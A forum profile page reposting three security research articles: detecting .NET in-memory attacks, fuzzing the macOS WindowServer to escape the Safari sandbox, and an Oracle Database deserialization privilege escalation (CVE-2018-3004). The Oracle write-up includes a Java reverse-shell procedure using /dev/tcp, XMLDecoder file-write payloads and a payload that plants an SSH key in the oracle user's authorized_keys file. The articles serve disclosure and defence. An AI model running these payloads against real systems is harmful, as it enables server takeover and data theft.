Jump to content

Nytro

Administrators
  • Posts

    18785
  • Joined

  • Last visited

  • Days Won

    738

Everything posted by Nytro

  1. Hunting for In-Memory .NET Attacks Joe Desimone October 10, 2017 In past blog posts, we shared our approach to hunting for traditional in-memory attacks along with in-depth analysis of many injection techniques. As a follow up to my DerbyCon presentation, this post will investigate an emerging trend of adversaries using .NET-based in-memory techniques to evade detection. I’ll discuss both eventing (real-time) and on-demand based detection strategies of these .NET techniques. At Endgame, we understand that these differing approaches to detection and prevention are complimentary, and together result in the most robust defense against in-memory attacks. The .NET Allure Using .NET in-memory techniques, or even standard .NET applications, are attractive to adversaries for several reasons. First and foremost, the .NET framework comes pre-installed in all Windows versions. This is important as it enables the attackers’ malware to have maximum compatibility across victims. Next, the .NET PE metadata format itself is fairly complicated. Due to resource constraints, many endpoint security vendors have limited insight into the managed (.NET) structures of these applications beyond what is shared with vanilla, unmanaged (not .NET) applications. In other words, most AVs and security products don’t defend well against malicious .NET code and adversaries know it. Finally, the .NET framework has built-in functionality to dynamically load memory-only modules through the Assembly.Load(byte[]) function (and its various overloads). This function allows attackers to easily craft crypters/loaders, keep their payloads off disk, and even bypass application whitelisting solutions like Device Guard. This post focuses on the Assembly.Load function due to the robust set of attacker capabilities it supports. .NET Attacker Techniques Adversaries leveraging .NET in-memory techniques is not completely new. However, in the last six months there has been a noticeable uptick in tradecraft, which I’ll briefly discuss to illustrate the danger. For instance, in 2014, DEEP PANDA, a threat group suspected of operating out of China, was observed using the multi-stage MadHatter implant which is written in .NET. More interestingly, this implant exists only in memory after a multi stage Assembly.Load bootstrapping process that begins with PowerShell. PowerShell can directly call .NET methods, and the Assembly.Load function being no exception. It is as easy as calling [System.Reflection.Assembly]::Load($bin). More recently, the OilRig APT Group used a packed .NET malware sample known as ISMInjector to evade signature based detection. During the unpacking routine, the sample uses the Assembly.Load function to access the embedded next stage malware known as ISMAgent. A third example, more familiar to red teams, is ReflectivePick by Justin Warner and Lee Christensen. ReflectivePick allows PowerShell Empire to inject and bootstrap PowerShell into any running process. It leverages the Assembly.Load() method to load their PowerShell runner DLL without dropping it to disk. The image below shows the relevant source code of their tool. It is important to point out that Assembly.Load, being a core function of the .NET framework, is often used in legitimate programs. This includes built-in Microsoft applications, which has led to an interesting string of defense evasion and application whitelisting bypasses. For example, Matt Graeber discovered a Device Guard bypass that targets a race condition to hijack legitimate calls to Assembly.Load, allowing an attacker to execute any unsigned .NET code on a Device Guard protected host. Because of the difficulty in fixing such a technique, Microsoft currently has decided not to service this issue, leaving attackers a convenient “forever-day exploit” against hosts that are hardened with application whitelisting. Casey Smith also has published a ton of research bypassing application whitelisting solutions. A number of these techniques, at their core, target signed Microsoft applications that call the Assembly.Load method with attacker supplied code. One example is MSBuild, which comes pre-installed on Windows and allows attackers to execute unsigned .NET code inside a legitimate and signed Microsoft process. These techniques are not JUST useful to attackers who are targeting application whitelisting protected environments. Since they allow attacker code to be loaded into legitimate signed processes in an unconventional manner, most anti-virus and EDR products are blind to the attacker activity and can be bypassed. Finally, James Forshaw developed the DotNetToJScript technique. At its heart, this technique leverages the BinaryFormatter deserialization method to load a .NET application using only JScript. Interestly enough, the technique under the hood will make a call to the Assembly.Load method. DotNetToJscript opened the door for many new clever techniques for executing unsigned .NET code in a stealthy manner. For example, James demonstrated how to combine DotNetToJScript with com hijacking and Casey’s squiblydoo technique to inject code into protected processes. In another example, Casey weaponized DotNetToJScript in universal.js to execute arbitrary shellcode or PowerShell commands. The number of Microsoft-signed applications that be can be abused to execute attacker code in a stealthy manner is dizzying. Fortunately, the community has been quick to document and track them publically in a number of places. One good reference is Oddvar Moe’s UltimateAppLockerByPassList, and another is Microsoft’s own reference. Detecting .NET Attacks As these examples illustrate, attackers are leveraging .NET in various ways to defeat and evade endpoint detection. Now, let’s explore two approaches to detecting these attacks: on-demand and real-time based techniques. On-Demand Detection On-demand detection leverages snapshot in time type data collection. You don’t need a persistent agent running and collecting data when the attack takes place, but you do need the malicious code running during the hunt/collection time. The trick is to focus on high-value data that can capture actor-agnostic techniques, and has a high signal-to-noise ratio. One example is the Get-InjectedThread script for detecting traditional unmanaged in-memory injection techniques. To demonstrate detecting .NET malware usage of the Assembly.Load function, I leverage PowerShell Empire by Will Schroeder and others. Empire allows you to inject an agent into any process by remotely bootstrapping PowerShell. As you see below, after injection calc.exe has loaded the PowerShell core library System.Management.Automation.ni.dll. This fact alone can be interesting, but a surprisingly large number of legitimate applications load PowerShell. Combining this with process network activity and looking for outliers across all your data may give you better mileage. Upon deeper inspection, we see something even more interesting. As shown below, memory section 0x2710000 contains a full .NET module (PE header present). The characteristics of the memory region are a bit unusual. The type is MEM_MAPPED, although there is no associated file mapping object (Note the “Use” field is empty in ProcessHacker). Lastly, the region has a protection of PAGE_READWRITE, which surprisingly is not executable. These memory characteristics are a side effect of loading a memory-only module with the Assembly.Load(byte[]) method. To automate this type of hunt, I wrote a PowerShell function called Get-ClrReflection which looks for this combination of memory characteristics and will save any hits for further analysis. Below is sample output after running it against a workstation that was infected with Empire. Once again, you will see hits for legitimate applications that leverage the Assembly.Load function. One common false positive is for XmlSerializer generated assemblies. Standard hunt practices apply. Bucket your hits by process name or better yet with a fuzzy hash match. For example, ClrGuard (details next) will give you TypeRef hash with a “-f” switch. Below is an example from Empire. Eventing-Based Detection Eventing based detecting is great because you won’t need luck that an adversary is active while you are hunting. It also gives you an opportunity to prevent attacker techniques in real-time. To provide signals into the CLR on which .NET runs, we developed and released ClrGuard. ClrGuard will hook into all .NET processes on the system. From there, it performs an in-line hook of the native LoadImage() function. This is what Assembly.Load() calls under the CLR hood. When events are observed, they are sent over a named pipe to a monitoring process for further introspection and mitigation decision. For example, Empire’s psinject function can be immediately detected and blocked in real-time as shown in the image below. In a similar manner, OilRig’s ISMInjector can be quickly detected and blocked. Another example below shows ClrGuard in action against Casey Smith’s universal.js tool. While we don’t recommend you run ClrGuard across your enterprise (it is Proof of Concept grade), we hope it spurs community discussion and innovation against these types of .NET attacks. These sorts of defensive techniques power protection across the Endgame product, and an enterprise-grade ClrGuard-like feature will be coming soon. Conclusion It is important to thank those doing great offensive security research who are willing to publish their capabilities and tradecraft for the greater good of the community. The recent advancements in .NET in-memory attacks have shown that it is time for defenders to up their game and go toe-to-toe with the more advanced red teams and adversaries. We hope that ClrGuard and Get-ClrReflection help balance the stakes. These tools can increase a defenders optics into .NET malware activities, and raise visibility into this latest evolution of attacker techniques. Sursa: https://www.endgame.com/blog/technical-blog/hunting-memory-net-attacks
      • 1
      • Thanks
  2. Cracking the Walls of the Safari Sandbox Fuzzing the macOS WindowServer for Exploitable Vulnerabilities July 25, 2018 / Patrick Biernat & Markus Gaasedelen When exploiting real world software or devices, achieving arbitrary code execution on a system may only be the first step towards total compromise. For high value or security conscious targets, remote code execution is often succeeded by a sandbox escape (or a privilege escalation) and persistence. Each of these stages usually require their own entirely unique exploits, making some weaponized zero-days a ‘chain’ of exploits. Considered high risk consumer software, modern web browsers use software sandboxes to contain damage in the event of remote compromise. Having exploited Apple Safari in the previous post, we turn our focus towards escaping the Safari sandbox on macOS in an effort to achieve total system compromise. Using Frida to fuzz the macOS WindowServer from the lockscreen As the fifth blogpost of our Pwn2Own series, we will discuss our experience evaluating the Safari sandbox on macOS for security vulnerabilities. We will select a software component exposed to the sandbox, and utilize Frida to build an in-process fuzzer as a means of discovering exploitable vulnerabilities. Software Sandboxes Software sandboxing is often accomplished by restricting the runtime privileges of an application through platform-dependent security features provided by the operating system. When layered appropriately, these security controls can limit the application’s ability to communicate with the broader system (syscall filtering, service ACLs), prevent it from reading/writing files on disk, and block external resources (networking). Tailored to a specific application, a sandbox will aggressively reduce the system’s exposure to a potentially malicious process, preventing the process from making persistent changes to the machine. As an example, a compromised but sandboxed application cannot ransomware user files on disk if the process was not permitted filesystem access. A diagram of the old Adobe Reader Protected Mode Sandbox, circa 2010 Over the past several years we have seen sandboxes grow notably more secure in isolating problematic software. This has brought about discussion regarding the value of a theoretically perfect software sandbox: when properly contained does it really matter if an attacker can gain arbitrary code execution on a machine? The answer to this question has been hotly debated amongst security researchers. This discussion has been further aggravated by the contrasting approach to browser security taken by Microsoft Edge versus Google Chrome. Where one leads with in-process exploit mitigations (Edge), the other is a poster child for isolation technology (Chrome). As a simple barometer, the Pwn2Own results over the past several years seem to indicate that sandboxing is winning when put toe-to-toe against advanced in-process mitigations. There are countless opinions on why this may be the case, and whether this trend holds true for the real world. To state it plainly, as attackers we do think that sandboxes (when done right) add considerable value towards securing software. More importantly, this is an opinion shared by many familiar with attacking these products. THE (MEMORY CORRUPTION) SAFETY DANCE (13:25) at SAS 2017, by Mark Dowd However, as technology improves and gives way to mitigations such as strict control flow integrity (CFI), these views may change. The recent revelations wrought by Meltdown & Spectre is a great example of this, putting cracks into even the theoretically perfect sandbox. At the end of the day, both sandboxing and mitigation technologies will continue to improve and evolve. They are not mutually exclusive of each other, and play an important role towards raising the costs of exploitation in different ways. macOS Sandbox Profiles On macOS, there is a powerful low-level sandboxing technology called ‘Seatbelt’ which Apple has deprecated (publicly) in favor of the higher level ‘App Sandbox’. With little-to-no official documentation available, information on how to use the former system sandbox has been learned through reverse engineering efforts by the community (1,2,3,4,5, …). To be brief, the walls of Seatbelt-based macOS sandboxes are built using rules that are defined in a human-readable sandbox profile. A few of these sandbox profiles live on disk, and can be seen tailored to the specific needs of their specific application. For the Safari browser, its sandbox profile is comprised of the following to files (locations may vary): /System/Library/Sandbox/Profiles/system.sb /System/Library/StagedFrameworks/Safari/WebKit.framework/Versions/A/Resources/com.apple.WebProcess.sb The macOS sandbox profiles are written in a language called TinyScheme. Profiles are often written as a whitelist of actions or services required by the application, disallowing access to much of the broader system by default. ... (version 1) (deny default (with partial-symbolication)) (allow system-audit file-read-metadata) (import "system.sb") ;;; process-info* defaults to allow; deny it and then allow operations we actually need. (deny process-info*) (allow process-info-pidinfo) ... For example, the sandbox profile can whitelist explicit directories or files that the sandboxed application should be permitted access. Here is a snippet from the WebProceess.sb profile, allowing Safari read-only access to certain directories that store user preferences on disk: ... ;; Read-only preferences and data (allow file-read* ;; Basic system paths (subpath "/Library/Dictionaries") (subpath "/Library/Fonts") (subpath "/Library/Frameworks") (subpath "/Library/Managed Preferences") (subpath "/Library/Speech/Synthesizers") ... Serving almost like horse blinders, sandbox profiles help focus our attention (as attackers) by listing exactly what non-sandboxed resources we can interface with on the system. This helps enumerate relevant attack surface that can be probed for security defects. Escaping Sandboxes In practice, sandbox escapes are often their own standalone exploit. This means that an exploit to escape the browser sandbox is almost always entirely unique from the exploit used to achieve initial remote code execution. When escaping software sandboxes, it is common to attack code that executes outside of a sandboxed process. By exploiting the kernel or an application (such as a system service) running outside the sandbox, a skilled attacker can pivot themselves into a execution context where there is no sandbox. The Safari sandbox policy explicitly whitelists a number of external software attack surfaces. As an example, the policy snippet below highlights a number of IOKit interfaces which can be accessed from the sandbox. This is because they expose system controls that are required by certain features in the browser. ... ;; IOKit user clients (allow iokit-open (iokit-user-client-class "AppleMultitouchDeviceUserClient") (iokit-user-client-class "AppleUpstreamUserClient") (iokit-user-client-class "IOHIDParamUserClient") (iokit-user-client-class "RootDomainUserClient") (iokit-user-client-class "IOAudioControlUserClient") ... Throughout the profile, entries that begin with iokit-* refer to functionality we can invoke via an IOKit framework. These are the userland client (interfaces) that one can use to communicate with their relevant kernel counterparts (kexts). Another interesting class of rules defined in the sandbox profile fall under allow mach-lookup: ... ;; Remote Web Inspector (allow mach-lookup (global-name "com.apple.webinspector")) ;; Various services required by AppKit and other frameworks (allow mach-lookup (global-name "com.apple.FileCoordination") (global-name "com.apple.FontObjectsServer") (global-name "com.apple.PowerManagement.control") (global-name "com.apple.SystemConfiguration.configd") (global-name "com.apple.SystemConfiguration.PPPController") (global-name "com.apple.audio.SystemSoundServer-OSX") (global-name "com.apple.analyticsd") (global-name "com.apple.audio.audiohald") ... The allow mach-lookup keyword depicted above is used to permit the sandboxed application access to various remote procedure call (RPC)-like servers hosted within system services. These policy definitions allow our application to communicate with these whitelisted RPC servers over the mach IPC. Additionally, there are some explicitly whitelisted XPC services: ... (deny mach-lookup (xpc-service-name-prefix "")) (allow mach-lookup (xpc-service-name "com.apple.accessibility.mediaaccessibilityd") (xpc-service-name "com.apple.audio.SandboxHelper") (xpc-service-name "com.apple.coremedia.videodecoder") (xpc-service-name "com.apple.coremedia.videoencoder") ... XPC is higher level IPC used to facilitate communication between processes, again built on top of the mach IPC. XPC is fairly well documented, with a wealth of resources and security research available for it online (1,2,3,4, …). There are a few other interesting avenues of attacking non-sandboxed code, including making syscalls directly to the XNU kernel, or through IOCTLs. We did not spend any time looking at these surfaces due to time. Our evaluation of the sandbox was brief, so our knowledge and insight only extends so far. A more interesting exercise for the future would be to enumerate attack surface that currently cannot be restrained by sandbox policies. Target Selection Having surveyed some of the components exposed to the Safari sandbox, the next step was to decide what we felt would be easiest to target as a means of escape. Attacking components that live in the macOS Kernel is attractive: successful exploitation guarantees not only a sandbox escape, but also unrestricted ring-zero code execution. With the introduction of ‘rootless’ in macOS 10.11 (El Capitan), a kernel mode privilege escalation is necessary to do things such as loading unsigned drivers without disabling SIP. The cons of attacking kernel code comes at the cost of debuggability and convenience. Tooling to debug or instrument kernel code is primitive, poorly documented, or largely non-existent. Reproducing bugs, analyzing crashes, or stabilizing an exploit often require a full system reboot which can be taxing on time and morale. After weighing these traits and reviewing public research on past Safari sandbox escapes, we zeroed in on the WindowServer. A complex usermode system service that was accessible to the Safari sandbox over the mach IPC: (allow mach-lookup ... (global-name "com.apple.windowserver.active") ... ) For our purposes, WindowServer appeared to be nearly an ideal target: Nearly every process can communicate with it (Safari included) It lives in userland, simplifying debugging and introspection It runs with permissions essentially equivalent to root It has a relatively large attack surface It has a notable history of security vulnerabilities WindowServer is a closed-source, private framework (a library) which implies developers are not meant to interface with it directly. This also means that official documentation is non-existent, and what little information is available publicly is thin, dated, or simply incomplete. WindowServer Attack Surface WindowServer works by processing incoming mach_messages from applications running on the system. On macOS, mach_messages are a form of IPC to enable communication between running processes. The Mach IPC is generally used by system services to expose a RPC interface for other applications to call into. Under the hood, virtually every GUI macOS application transparently communicates with the WindowServer. As hinted by its name, the WindowServer system service is responsible for actually drawing application windows to the screen. A running application will tell the WindowServer (via RPC) what size or shape to make the window, and where to put it: The WindowServer renders virtually all desktop applications on macOS For those familiar with Microsoft Windows, the macOS WindowServer is a bit like a usermode Win32k, albeit less-complex. It is also responsible for drawing the mouse cursor, managing hotkeys, and facilitating some cross-process communication (among other many other things). Applications can interface with the WindowServer over the mach IPC to reach some 600 RPC-like functions. When the privileged WindowServer system service receives a mach_message, it will be routed to its respective message handler (a ‘remote procedure’) coupled with foreign data to be parsed by the handler function. A selection of WindowServer mach message handlers As an attacker, these functions prefixed with _X... (such as _XBindSurface) represent directly accessible attack surface. From the Safari sandbox, we can send arbitrary mach messages (data) to the WindowServer targeting any of these functions. If we can find a vulnerability in one of these functions, we may be able to exploit the service. We found that these 600 some handler functions are split among three MIG-generated mach subsystems within the WindowServer. Each subsystem has its own message dispatch routine which initially parses the header of the incoming mach messages and then passes the message specific data on to its appropriate handler via indirect call: RAX is a code pointer to a message handler function that is selected based on the incoming message id The three dispatch subsystems make for an ideal place to fuzz the WindowServer in-process using dynamic binary instrumentation (DBI). They represent a generic ‘last hop’ for incoming data before it is delivered to any of the ~600 individual message handlers. Without having to reverse engineer any of these surface level functions or their unique message formats (input), we had discovered a low-cost avenue to begin automated vulnerability discovery. By instrumenting these chokepoints, we could fuzz all incoming WindowServer traffic that can be generated through normal user interaction with the system. In-process Fuzzing With Frida Frida is a DBI framework that injects a JavaScript interpreter into a target process, enabling blackbox instrumentation via user provided scripts. This may sound like a bizarre use of JavaScript, but this model allows for rapid prototyping of near limitless binary introspection against compiled applications. We started our Frida fuzzing script by defining a small table for the instructions we wished to hook at runtime. Each of these instructions were an indirect call (eg, call rax) within the dispatch routines covered in the previous section. // instructions to hook (offset from base, reg w/ call target) var targets = [ ['0x1B5CA2', 'rax'], // WindowServer_subsystem ['0x2C58B', 'rcx'], // Renezvous_subsystem ['0x1B8103', 'rax'] // Services_subsystem ] The JavaScript API provided by Frida is packed with functionality that allow one to snoop on or modify the process runtime. Using the Interceptor API, it is possible to hook individual instructions as a place to stop and introspect the process. The basis for our hooking code is provided below: function InstallProbe(probe_address, target_register) { var probe = Interceptor.attach(probe_address, function(args) { var input_msg = args[0]; // rdi (the incoming mach_msg) var output_msg = args[1]; // rsi (the response mach_msg) // extract the call target & its symbol name (_X...) var call_target = this.context[target_register]; var call_target_name = DebugSymbol.fromAddress(call_target); // ready to read / modify / replay console.log('[+] Message received for ' + call_target_name); // ... }); return probe; } To hook the instructions we defined earlier, we first resolved the base address of the private SkyLight framework that they reside in. We are then able to compute the virtual addresses of the target instructions at runtime using the module base + offset. After that it is as simple as installing the interceptors on these addresses: // locate the runtime address of the SkyLight framework var skylight = Module.findBaseAddress('SkyLight'); console.log('[*] SkyLight @ ' + skylight); // hook the target instructions for (var i in targets) { var hook_address = ptr(skylight).add(targets[i][0]); // base + offset InstallProbe(hook_address, targets[i][1]) console.log('[+] Hooked dispatch @ ' + hook_address); } During the installed message intercept, we now had the ability to record, modify, or replay mach message contents just before they are passed into their underlying message handler (an _X... function). This effectively allowed us to man-in-the-middle any mach traffic to these MIG subsystems and dump their contents at runtime: Using Frida to sniff incoming mach messages received by the WindowServer From this point, our fuzzing strategy was simple. We used our hooks to flip random bits (dumb fuzzing) on any incoming messages received by the WindowServer. Simultaneously, we recorded the bitflips injected by our fuzzer to create ‘replay’ log files. Replaying the recorded bitflips in a fresh instance of WindowServer gave us some degree of reproducibility for any crashes produced by our fuzzer. The ability to consistently reproduce a crash is priceless when trying to identify the underlying bug. A sample snippet of a bitflip replay log looked like the following: ... {"msgh_bits":"0x1100","msgh_id":"0x7235","buffer":"000000001100000001f65342","flip_offset":[4],"flip_mask":[16]} {"msgh_bits":"0x1100","msgh_id":"0x723b","buffer":"00000000010000000900000038a1b63e00000000"} {"msgh_bits":"0x80001112","msgh_id":"0x732f","buffer":"0000008002000000ffffff7f","ool_bits":"0x1000101","desc_count":1} {"msgh_bits":"0x1100","msgh_id":"0x723b","buffer":"00000000010000000900000070f3a53e00000000","flip_offset":[12],"flip_mask":[2]} {"msgh_bits":"0x80001100","msgh_id":"0x722a","buffer":"0000008002000000dfffff7f","ool_bits":"0x1000101","desc_count":1,"flip_offset":[8],"flip_mask":[32]} ... In order for the fuzzer to be effective, the final step required us to stimulate the system to generate WindowServer message ‘traffic’. This could have been accomplished any number of ways, such as letting a user navigate around the system, or writing scripts to randomly open applications and move them around. But through careful study of pop culture and past vulnerabilities, we decided to simply place a weight on the ‘Enter’ key: 'Advanced Persistent Threat' On the macOS lockscreen, holding ‘Enter’ happens to generate a reasonable variety of message traffic to the WindowServer. When a crash occurred as a result of our bitflipping, we saved the replay log and crash state to disk. Conveniently, when WindowServer crashes, macOS locked the machine and restarted the service… bringing us back to the lockscreen. A simple python script running in the background sees the new WindowServer instance pop up, injecting Frida to start the next round of fuzzing. This was the lowest-effort and lowest-cost fuzzer we could have made for this target, yet it still proved fruitful. Discovery & Root Cause Analysis Leaving the fuzzer to run overnight, it produced a number of unique (mostly useless) crashes. Among the handful of more interesting crashes was one that looked particularly promising but would require additional investigation. We replayed the bitflip log for that crash against a new instance of WindowServer with lldb (the default macOS debugger) attached and were able to reproduce the issue. The crashing instruction and register state depicted what looked like an Out-of-Bounds Read: Process 77180 stopped * thread #1, queue = 'com.apple.main-thread', stop reason = EXC_BAD_ACCESS (address=0x7fd68940f7d8) frame #0: 0x00007fff55c6f677 SkyLight`_CGXRegisterForKey + 214 SkyLight`_CGXRegisterForKey: -> 0x7fff55c6f677 <+214>: mov rax, qword ptr [rcx + 8*r13 + 0x8] 0x7fff55c6f67c <+219>: test rax, rax 0x7fff55c6f67f <+222>: je 0x7fff55c6f6e9 ; <+328> 0x7fff55c6f681 <+224>: xor ecx, ecx Target 0: (WindowServer) stopped. In the crashing context, r13 appeared to be totally invalid (very large). Another attractive component of this crash was its proximity to a top-level \_X... function. The shallow nature of this crash implied that we would likely have direct control over the malformed field that caused the crash. (lldb) bt * thread #1, queue = 'com.apple.main-thread', stop reason = EXC_BAD_ACCESS (address=0x7fd68940f7d8) * frame #0: 0x00007fff55c6f677 SkyLight`_CGXRegisterForKey + 214 frame #1: 0x00007fff55c28fae SkyLight`_XRegisterForKey + 40 frame #2: 0x00007ffee2577232 frame #3: 0x00007fff55df7a57 SkyLight`CGXHandleMessage + 107 frame #4: 0x00007fff55da43bf SkyLight`connectionHandler + 212 frame #5: 0x00007fff55e37f21 SkyLight`post_port_data + 235 frame #6: 0x00007fff55e37bfd SkyLight`run_one_server_pass + 949 frame #7: 0x00007fff55e377d3 SkyLight`CGXRunOneServicesPass + 460 frame #8: 0x00007fff55e382b9 SkyLight`SLXServer + 832 frame #9: 0x0000000109682dde WindowServer`_mh_execute_header + 3550 frame #10: 0x00007fff5bc38115 libdyld.dylib`start + 1 frame #11: 0x00007fff5bc38115 libdyld.dylib`start + 1 Root cause analysis to identify the bug responsible for this crash took only minutes. Directly prior to the crash was a signed/unsigned comparison issue within _CGXRegisterForKey(...): Signed Comparison vulnerability in WindowServer WindowServer tries to ensure that the user-controlled index parameter is six or less. However, this check is implemented as a signed-integer comparison. This means that supplying a negative number of any size (eg, -100000) will incorrectly get us past the check. Our ‘fuzzed’ index was a 32bit field in the mach message for _XRegisterForKey(...). The bit our fuzzer flipped happened to be the uppermost bit, changing the number to a massive negative value: HEX | BINARY | DECIMAL ----------+----------------------------------+------------- BEFORE: 0x0000005 | 00000000000000000000000000000101 | 5 AFTER: 0x8000005 | 10000000000000000000000000000101 | -2147483643 ^ |- Corrupted bit Assuming we can get the currently crashing read to succeed through careful indexing to valid memory, there are a few minor constraints between us and what looks like an exploitable write later in the function: A write of unknown values (r15, ecx) can occur at the attacker controlled Out-of-Bounds index Under the right conditions, this bug appears to be an Out-of-Bounds Write! Any vulnerability that allows for memory corruption (a write) is generally categorized as an exploitable condition (until proven otherwise). This vulnerability has since been fixed as CVE-2018-4193. In the next post, we provide a standalone PoC to trigger this crash and detail the constraints that make this bug rather difficult to exploit while developing our full Safari sandbox escape exploit against the WindowServer. Conclusion Escaping a software sandbox is a necessary step towards total system compromise when exploiting modern browsers. We used this post to discuss the value of sandboxing technology, the standard methodology to escape one, and our approach towards evaluating the Safari sandbox for a means of escaping it. By reviewing existing resources, we devised a strategy to tackle the Safari sandbox and fuzz a historically problematic component (WindowServer) with a very simple in-process fuzzer. Our process demonstrates nothing novel, and that even contrived fuzzers are still able to find critical, real-world bugs. Sursa: http://blog.ret2.io/2018/07/25/pwn2own-2018-safari-sandbox/
      • 1
      • Upvote
  3. Wednesday, July 18, 2018 Oracle Privilege Escalation via Deserialization TLDR: Oracle Database is vulnerable to user privilege escalation via a java deserialization vector that bypasses built in Oracle JVM security. Proper exploitation can allow an attacker to gain shell level access on the server and SYS level access to the database. Oracle has opened CVE-2018-3004 for this issue. Deserialization Vulnerabilities Java deserialization vulnerabilities have been all the rage for the past few years. In 2015, Foxglove security published an article detailing a critical security vulnerability in many J2EE application servers which left servers vulnerable to remote code execution. There have been a number published exploits relying on Java deserializations since the 2015 Foxglove article, many based on the ysoserial library. There have also been a number of CVEs opened, and patches issued to resolve these defects, including Oracle specific CVEs such as CVE-2018-2628, CVE-2017-10271, CVE-2015-4852 The majority of the published exploits focus on application servers vulnerable to deserialization attacks. Today, however, I would like to explore Oracle Database and how it is vulnerable to a custom deserialization attack based on the tight integration of Java via Java Stored Procedures in Oracle Database. The examples in this post were created using Oracle 12C, however, earlier versions of Oracle Database are also vulnerable. Java Stored Procedures Oracle Enterprise Edition has a Java Virtual Machine embedded into the database and Oracle Database supports native execution of Java via Java Stored Procedures. ? 1 2 3 create function get_java_property(prop in varchar2) return varchar2 is language java name 'java.name.System.getProperty(java.lang.String) return java.lang.String'; / Basic JVM Protections Of course if you have some level of familiarity with Java and penetration testing, you may immediately leap to the notion of creating a reverse shell compiled within Oracle Database: ? 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 SET scan off create or replace and compile java source named ReverseShell as import java.io.*; public class ReverseShell{ public static void getConnection(String ip, String port) throws InterruptedException, IOException{ Runtime r = Runtime.getRuntime(); Process p = r.exec(new String[]{"/bin/bash","-c","0<&126-;exec 126<>/dev/tcp/" + ip + "/" + port + ";/bin/bash <&126 >&126 2>&126"}); System.out.println(p.toString()); p.waitFor(); } } / create or replace procedure reverse_shell (p_ip IN VARCHAR2,p_port IN VARCHAR2) IS language java name 'ReverseShell.getConnection(java.lang.String, java.lang.String)'; / This approach will not work as the Oracle JVM implements fine grain policy-based security to control access to the OS and filesystem. Executing this procedure from a low-permissioned account results in errors. Note the error stack contains the missing permission and command necessary to grant the access: ? 1 2 ORA-29532: Java call terminated by uncaught Java exception: java.security.AccessControlException: the Permission (java.io.FilePermission /bin/bash execute) has not been granted to TESTER. The PL/SQL to grant this is dbms_java.grant_permission( 'TESTER', 'SYS:java.io.FilePermission','/bin/bash', 'execute' ) There have been previously reported methods to bypass the built-in Java permissions which will not be discussed in this post. Instead I am going to demonstrate a new approach to bypassing these permissions via XML deserialization. XML Deserialization XML serialization and deserializtion exist in Java to support cross platform information exchange using a standardized industry format (in this case XML). To this end, the java.beans library contains two classes: XMLEncoder and XMLDecoder which are used to serialize a Java object into an XML format and at a later time, deserialize the object. Typical deserialization vulnerabilities rely on the existence of a service that accepts and deserializes arbitrary input. However, if you have access to a low-privileged Oracle account that can create objects in the user schema (i.e., a user with connect and resource) you can create your own vulnerable deserialization procedure. As the "TESTER" user, I have created the following Java class "DecodeMe" and a Java Stored Procedure that invokes this class: ? 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 create or replace and compile java source named DecodeMe as import java.io.*; import java.beans.*; public class DecodeMe{ public static void input(String xml) throws InterruptedException, IOException { XMLDecoder decoder = new XMLDecoder ( new ByteArrayInputStream(xml.getBytes())); Object object = decoder.readObject(); System.out.println(object.toString()); decoder.close(); } } ; / CREATE OR REPLACE PROCEDURE decodeme (p_xml IN VARCHAR2) IS language java name 'DecodeMe.input(java.lang.String)'; / The decodeme procedure will accept an arbitrary string of XML encoded Java and execute the provided instructions. Information on the proper format for the serialized XML can be found here. This block will simply call println to output data to the terminal. ? 1 2 3 4 5 6 7 8 9 10 BEGIN decodeme('<?xml version="1.0" encoding="UTF-8" ?> <java version="1.4.0" class="java.beans.XMLDecoder"> <object class="java.lang.System" field="out"> <void method="println"> <string>This is test output to the console</string> </void> </object> </java>'); END; / The Vulnerability Of course we don't need a deserialization process to print output to the console, so how exactly is this process vulnerable? It turns out that the deserialization process bypasses JVM permission settings and allows a user to arbitrarily write to files on the OS. See the following example script: ? 1 2 3 4 5 6 7 8 9 10 11 12 13 14 BEGIN decodeme(' <java class="java.beans.XMLDecoder" version="1.4.0" > <object class="java.io.FileWriter"> <string>/tmp/PleaseDoNotWork.txt </string> <boolean>True</boolean> <void method="write"> <string>Why for the love of god?</string> </void> <void method="close" /> </object> </java>'); END; / Executing this anonymous block creates a file named "PleaseDoNotWork.txt" in the /tmp folder: Therefore via deserialiazation, we can write arbitrary files to the file system, bypassing the built-in security restrictions. Exploitation As it turns out, we can not only write new files to the system, we can also overwrite or append any file on which the Oracle user has write permissions. Clearly this has severe ramifications for the database, as an attacker could overwrite critical files - including control files - which could result in a successful Denial of Service attack or data corruption. However, with a carefully crafted payload, we can use this deserialization attack to gain access to the server as the Oracle user. Assuming SSH is open on the server and configured to accept RSA connections, the following payload will append an RSA token to the Oracle account that manages the database processes. BEGIN AUTHKEY ? 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 BEGIN decodeme(' <java class="java.beans.XMLDecoder" version="1.4.0"> <object class="java.io.FileWriter"> <string>/home/oracle/.ssh/authorized_keys</string> <boolean>True</boolean> <void method="write"> <string>ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCedKQPeoJ1UeJEW6ZVkiuWAxBKW8F4fc0VrWxR5HEgaAcVodhgc6X7klyOWrJceGqICcCZd6K+/lvI3xaE2scJpRZWlcJQNCoZMRfmlhibq9IWMH0dm5LqL3QMqrXzZ+a2dfNohSdSmLDTaFHkzOGKEQIwHCv/e4e/eKnm0fUWHeL0k4KuCn3MQUN1HwoqoCciR0DrBDOYAKHxqpBv9rDneCdvaS+tqlr5eShjNlHv1YzJGb0lZZlsny19is8CkhcZ6+O+UCKoBPrxaGsfipsEIH5aPu9xVA90Xgsakhg4yoy9FLnES+xmnVxKX5GHyixi3qeWGDwBsAvhAAGLxOc5 </string> </void> <void method="close" /> </object> </java> '); END; / When executed, the code will append an arbitrary RSA key to the Oracle users authorized_keys file, granting an attack SSH access as the Oracle user. The Oracle user can access the database as SYS and the attacker has effectively compromised the entire database. Impact As Oracle Database has a high per instance cost, many production architectures rely on a shared-tennant model, where multiple mission applications leverage the same database, and application support users share access to the same system. Furthermore, Oracle Exadata implementations often host multiple database instances on the same severs. If a low privileged user, perhaps a tier-III support admin for a specific application, were to deploy this exploit, they could effectively gain access to the data and applications supporting an entire enterprise. Conclusion As we can see the deserialization design pattern implemented in java continues to create a myriad of vulnerabilities. Security analysts should look beyond J2EE based deserializiation attacks and consider attack vectors based on other embedded implementations. Reporting Timeline. This issue was first reported to Oracle Support in January 2018, and was addressed in the July 2018 CPU released on July 17th, 2018. Update: Navigating the intricacies of Oracle patches can be quite the challenge. The Oracle bug for this vulnerability is Bug 27923353, and the patch is for the OJVM system. For this POC, the proper patch is OJVM release update 12.2.0.1.180717 (p27923353_122010_Linux-x86-64.zip) Sursa: 